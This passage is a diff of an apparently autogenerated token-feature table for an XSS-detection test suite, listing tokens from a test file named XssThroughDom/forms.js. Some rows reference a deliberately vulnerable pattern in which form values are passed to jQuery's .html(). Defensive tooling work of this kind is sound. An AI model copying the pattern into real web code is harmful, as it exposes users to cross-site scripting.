+| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:9 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:9 | $ | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:9 | $ | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:9 | $ | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:9 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | $("#id") | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | $("#id") | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | $("#id") | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | exceptional return of $("#id") | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | exceptional return of $("#id") | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:16 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:21 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:21 | $("#id").html | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:21 | $("#id").html | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:21 | $("#id").html | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:21 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | $("#id" ... .email) | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | $("#id" ... .email) | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | $("#id" ... .email) | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | exceptional return of $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | exceptional return of $("#id" ... .email) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | exceptional return of $("#id" ... .email) | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | exceptional return of $("#id" ... .email) | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:9:29:35 | exceptional return of $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24321,6 +159374,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | enclosingFunctionBody | values setSubmitting $ #id html values email | | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | enclosingFunctionName | handleSubmit | | autogenerated/Xss/XssThroughDom/forms.js:29:11:29:15 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:18:29:21 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:18:29:21 | html | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:18:29:21 | html | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:18:29:21 | html | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:18:29:21 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:23:29:28 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:23:29:28 | values | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:23:29:28 | values | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:23:29:28 | values | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:23:29:28 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24328,12 +159391,153 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | enclosingFunctionBody | values setSubmitting $ #id html values email | | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | enclosingFunctionName | handleSubmit | | autogenerated/Xss/XssThroughDom/forms.js:29:23:29:34 | values.email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:29:30:29:34 | email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:29:30:29:34 | email | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:29:30:29:34 | email | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:29:30:29:34 | email | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:29:30:29:34 | email | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | CalleeFlexibleAccessPath | withFormik() | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | calleeImports | formik | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | contextSurroundingFunctionParameters | | | autogenerated/Xss/XssThroughDom/forms.js:31:4:31:9 | MyForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:1:38:2 | (functi ... OK \\n}) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:1:38:2 | (functi ... OK \\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:1:38:2 | (functi ... OK \\n}) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | this | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | this | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | useFormikContext | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | useFormikContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | useFormikContext | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | useFormikContext | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:33:1 | useFormikContext | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | 'arguments' object of anonymous function | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | exceptional return of anonymous function | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | functio ... / OK \\n} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | functio ... / OK \\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | functio ... / OK \\n} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | return of anonymous function | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:33:2:38:1 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:32 | { value ... tForm } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:32 | { value ... tForm } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:32 | { value ... tForm } | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:32 | { value ... tForm } | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:32 | { value ... tForm } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | submitForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | submitForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | { value ... ntext() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | { value ... ntext() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | { value ... ntext() | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | { value ... ntext() | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:11:34:53 | { value ... ntext() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:13:34:18 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:21:34:30 | submitForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:51 | useFormikContext | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:51 | useFormikContext | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:51 | useFormikContext | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:51 | useFormikContext | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:51 | useFormikContext | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | exceptional return of useFormikContext() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | exceptional return of useFormikContext() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | exceptional return of useFormikContext() | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | exceptional return of useFormikContext() | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | exceptional return of useFormikContext() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | useFormikContext() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | useFormikContext() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | useFormikContext() | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | useFormikContext() | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:34:36:34:53 | useFormikContext() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:5 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:5 | $ | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:5 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | $("#id") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | $("#id") | enclosingFunctionBody | values submitForm useFormikContext $ #id html values email $ #id html submitForm email | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | $("#id") | enclosingFunctionName | | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:35:5:35:12 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| 